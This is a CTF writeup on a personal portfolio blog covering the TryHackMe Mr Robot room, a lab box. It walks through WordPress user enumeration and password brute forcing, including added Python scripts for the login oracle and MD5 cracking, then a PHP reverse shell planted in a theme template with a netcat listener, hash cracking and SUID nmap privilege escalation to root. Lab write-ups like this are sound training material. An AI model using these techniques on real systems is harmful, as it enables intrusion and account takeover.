NETHRAN. WEDAGE

Cybersecurity undergraduate and web developer based in Sri Lanka, passionate about penetration testing, VAPT, and ethical hacking.

CTF

THM: Mr Robot CTF

20 Feb 2024 Linux 3 Flags Medium

Mr Robot themed room — three hidden flags using WordPress exploitation, dictionary attack and SUID binary privilege escalation.


THM: Mr Robot CTF — Full Writeup

Mr Robot is a TryHackMe room inspired by the TV show of the same name. It runs a WordPress site whose robots.txt exposes a wordlist, an account with a weak password, and the stock theme editor which, once you are logged in as an administrator, lets you write a PHP reverse shell into a template file. Privilege escalation is via a SUID binary: an old version of nmap whose interactive mode drops a root shell.

Challenge Info

  • Platform: TryHackMe
  • OS: Linux
  • Difficulty: Medium
  • Flags: 3 keys hidden across the system

Step 1 — Enumeration

Start with a full Nmap scan to identify open ports and services:

nmap -sV -sC -p- --min-rate 5000 MACHINE_IP

Key results from the scan:

  • Port 80 — Apache httpd (WordPress site)
  • Port 443 — HTTPS (same WordPress site)
  • Port 22 — SSH (closed)

Only the web ports are open and accessible. SSH is closed so the entire attack chain runs through the web application.

Step 2 — Web Enumeration

Visiting the site presents an interactive Mr Robot themed terminal. Check standard files first — robots.txt reveals two entries:

http://MACHINE_IP/robots.txt

# Output:
User-agent: *
fsocity.dic
key-1-of-3.txt

Download both files immediately:

wget http://MACHINE_IP/fsocity.dic
wget http://MACHINE_IP/key-1-of-3.txt

key-1-of-3.txt contains the first flag. fsocity.dic is a large wordlist that will be used to brute force the WordPress login. Deduplicate it first to speed up the attack:

sort -u fsocity.dic > fsocity-uniq.dic
wc -l fsocity-uniq.dic
# Reduces from 858,160 to 11,451 unique words

Step 3 — WordPress Enumeration

Run WPScan to enumerate users and identify the WordPress version:

wpscan --url http://MACHINE_IP \
  --enumerate u

WPScan's user enumeration does not reliably turn up an account on this box, so fall back on the login form itself. On /wp-login.php an unknown username returns "Invalid username", while a known one returns "The password you entered for the username elliot is incorrect", so the error text is an oracle for valid accounts. Running the entries of fsocity-uniq.dic through that oracle (any password will do) identifies the username elliot.

Step 4 — WordPress Brute Force

Use the deduplicated wordlist to brute force the password for user elliot:

wpscan --url http://MACHINE_IP \
  --username elliot \
  --passwords fsocity-uniq.dic

WPScan finds the valid credentials:

Username: elliot
Password: ER28-0652

Log into the WordPress admin panel at /wp-admin.
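The oracle described in Steps 3 and 4, as an added example (not code from the original writeup): it classifies wp-login.php responses by WordPress's stock English error strings, uses that to enumerate usernames and then to guess the password for a known user. The fake_target function is a constructed stand-in for the box so the script runs offline; http_attempt is the real HTTP version and assumes the target speaks plain HTTP on /wp-login.php.

```python
"""WordPress login oracle: username enumeration and password guessing.

Added example, not part of the original writeup. The error strings are the
stock English messages printed by wp-login.php; fake_target is a constructed
stand-in so the script runs offline.
"""
import functools
import http.client
import urllib.parse
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# (status code, response headers, response body)
Response = Tuple[int, Dict[str, str], str]
Attempt = Callable[[str, str], Response]

# Fragments of wp-login.php's stock error messages (older and newer wording).
INVALID_USER_MARKERS = ("Invalid username", "Unknown username")
BAD_PASSWORD_MARKERS = ("is incorrect", "password you entered for the username")


def classify_login(resp: Response) -> str:
    """Map a wp-login.php response to: success / valid-user / invalid-user / unknown."""
    status, headers, body = resp
    location = headers.get("Location") or headers.get("location") or ""
    if status in (301, 302, 303) and "wp-admin" in location:
        return "success"            # logged in: WordPress redirects to the dashboard
    if any(m in body for m in BAD_PASSWORD_MARKERS):
        return "valid-user"         # account exists, password wrong
    if any(m in body for m in INVALID_USER_MARKERS):
        return "invalid-user"
    return "unknown"                # lockout plugin, CAPTCHA or WAF: stop and look


def enumerate_users(candidates: Iterable[str], attempt: Attempt,
                    probe_password: str = "probe") -> List[str]:
    """Return the candidate usernames the login form admits exist."""
    found = []
    for name in candidates:
        if classify_login(attempt(name, probe_password)) in ("valid-user", "success"):
            found.append(name)
    return found


def guess_password(username: str, wordlist: Iterable[str], attempt: Attempt) -> Optional[str]:
    """Try each word as the password for one known-valid user; first hit wins."""
    for word in wordlist:
        if classify_login(attempt(username, word)) == "success":
            return word
    return None


def http_attempt(host: str, username: str, password: str, port: int = 80) -> Response:
    """One real POST to /wp-login.php over plain HTTP (assumed URL; not exercised offline).

    http.client does not follow redirects, so the 302 to wp-admin reaches classify_login.
    """
    form = urllib.parse.urlencode({"log": username, "pwd": password, "wp-submit": "Log In"})
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("POST", "/wp-login.php", form,
                 {"Content-Type": "application/x-www-form-urlencoded"})
    r = conn.getresponse()
    resp = (r.status, dict(r.getheaders()), r.read().decode("utf-8", "replace"))
    conn.close()
    return resp


def fake_target(username: str, password: str) -> Response:
    """Constructed stand-in for the box: only 'elliot' exists, password as in the writeup."""
    if username != "elliot":
        return (200, {}, '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>')
    if password != "ER28-0652":
        return (200, {}, '<div id="login_error"><strong>ERROR</strong>: The password you entered '
                         'for the username <strong>elliot</strong> is incorrect.</div>')
    return (302, {"Location": "http://MACHINE_IP/wp-admin/"}, "")


if __name__ == "__main__":
    users = enumerate_users(["admin", "elliot", "mrrobot"], fake_target)
    print("valid users:", users)                                          # ['elliot']
    print("password:", guess_password(users[0], ["password", "ER28-0652"], fake_target))
    # Against a live host: attempt = functools.partial(http_attempt, "MACHINE_IP")
```

Against the real box, swap fake_target for functools.partial(http_attempt, "MACHINE_IP") and feed fsocity-uniq.dic to enumerate_users first and guess_password second; the "unknown" classification is the signal to stop and inspect the response rather than keep hammering, since a lockout or CAPTCHA plugin changes the page and the oracle silently breaks.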

Step 5 — Reverse Shell via WordPress

From the WordPress admin panel, navigate to Appearance > Editor and select the 404.php template. Replace its contents with a PHP reverse shell. Use the PentestMonkey reverse shell:

# Set your tun0 IP and port in the shell before pasting
# Download from:
# https://github.com/pentestmonkey/php-reverse-shell

# Edit these two lines in the shell:
$ip = '10.10.14.X';
$port = 4444;

Set up a Netcat listener, then trigger the shell by visiting a non-existent page:

nc -lvnp 4444
curl http://MACHINE_IP/nonexistent-page

A shell arrives as the daemon user.

Step 6 — Key 2 and Password Hash

Stabilise the shell then navigate to the robot user's home directory:

# Upgrade to a pty first: su (used below) refuses to run without one
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Navigate to robot's home
cd /home/robot
ls -la

Two files are present:

  • key-2-of-3.txt — readable only by robot
  • password.raw-md5 — readable by all

Read the MD5 hash and crack it offline:

cat /home/robot/password.raw-md5
# robot:c3fcd3d76192e4007dfb496cca67e13b

# Crack with hashcat
hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b \
  /usr/share/wordlists/rockyou.txt

The cracked password is abcdefghijklmnopqrstuvwxyz. Switch to the robot user and read the second flag:

su robot
# Password: abcdefghijklmnopqrstuvwxyz

cat /home/robot/key-2-of-3.txt
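The offline crack in this step, as an added example (not code from the original writeup): it parses the user:hash layout of password.raw-md5, hashes each wordlist candidate once and compares it against every pending user, which is exactly what makes an unsalted hash cheap to attack. The robot hash is the one on the box; the second account, the malformed line and the short wordlist are constructed so the script runs offline.

```python
"""Offline cracking of an unsalted raw-MD5 credential file.

Added example, not part of the original writeup. The robot hash is the one on
the box; the second entry and the wordlist are constructed for the demo.
"""
import hashlib
from typing import Dict, Iterable, Iterator, List, Optional


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def parse_raw_md5(text: str) -> Dict[str, str]:
    """Parse 'user:hexdigest' lines (the password.raw-md5 layout); skip malformed ones."""
    creds: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        digest = digest.strip().lower()
        if len(digest) == 32 and all(c in "0123456789abcdef" for c in digest):
            creds[user.strip()] = digest
    return creds


def candidates(word: str) -> Iterator[str]:
    """Cheap rule set: as-is, Capitalised, UPPER, and with one trailing digit."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for d in "0123456789":
        yield word + d


def crack(creds: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Return {user: plaintext or None} for every entry in creds.

    No salt means one MD5 per candidate is compared against all users at once,
    so the cost does not grow with the number of accounts.
    """
    pending: Dict[str, List[str]] = {}
    for user, digest in creds.items():
        pending.setdefault(digest, []).append(user)
    result: Dict[str, Optional[str]] = {user: None for user in creds}
    for word in wordlist:
        if not pending:
            break
        for cand in candidates(word):
            users = pending.pop(md5_hex(cand), None)
            if users:
                for user in users:
                    result[user] = cand
    return result


# Constructed sample: robot's real hash from the box plus a made-up second account.
SAMPLE_RAW_MD5 = (
    "robot:c3fcd3d76192e4007dfb496cca67e13b\n"
    "elliot:" + md5_hex("Letmein") + "\n"
    "broken line without a hash\n"
)
SAMPLE_WORDLIST = ["password", "letmein", "qwerty", "abcdefghijklmnopqrstuvwxyz"]


def demo() -> Dict[str, Optional[str]]:
    return crack(parse_raw_md5(SAMPLE_RAW_MD5), SAMPLE_WORDLIST)


if __name__ == "__main__":
    for user, pw in demo().items():
        print(f"{user}: {pw}")   # robot: abcdefghijklmnopqrstuvwxyz, elliot: Letmein
```

For a real wordlist, pass an iterator over the file (for example `(l.rstrip("\n") for l in open("rockyou.txt", errors="ignore"))`) instead of a list so it streams; hashcat does the same job far faster on a GPU, but the loop above makes the "one hash, every user" weakness of unsalted storage visible.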

Step 7 — Privilege Escalation (SUID Nmap)

Search for SUID binaries on the system to find privilege escalation vectors:

find / -perm -4000 -type f 2>/dev/null

The output includes /usr/local/bin/nmap — an old version of nmap (3.81) that has an interactive mode allowing shell execution:

nmap --interactive
# Inside nmap interactive mode:
!sh

whoami
# root

The !sh command inside nmap's interactive mode runs a shell from a process whose effective UID is root thanks to the SUID bit, and /bin/sh keeps that effective UID, so whoami reports root. Interactive mode was removed from later Nmap releases, which is why this only works with the old 3.81 build on the box; if the escape hands you bash instead of sh, start it with -p or it will drop the elevated effective UID.

Step 8 — Key 3

With a root shell, grab the final flag:

# Key 3
cat /root/key-3-of-3.txt

Key Takeaways

  • Always check robots.txt — it can expose sensitive files and wordlists
  • WordPress login errors leak valid usernames — use them to target brute force
  • Deduplicate wordlists before brute forcing — dramatically reduces attack time
  • WordPress theme editors allow arbitrary PHP execution: with admin credentials this is the foothold (remote code execution as the web user), not privilege escalation
  • SUID binaries like old nmap versions can be abused to escape to root
  • MD5 password hashes with no salt are trivially cracked with rockyou.txt

Tools Used

  • nmap — port scanning and service enumeration
  • wpscan — WordPress enumeration and brute forcing
  • netcat — reverse shell listener
  • hashcat — MD5 hash cracking
  • php-reverse-shell — PentestMonkey PHP shell
  • find — SUID binary discovery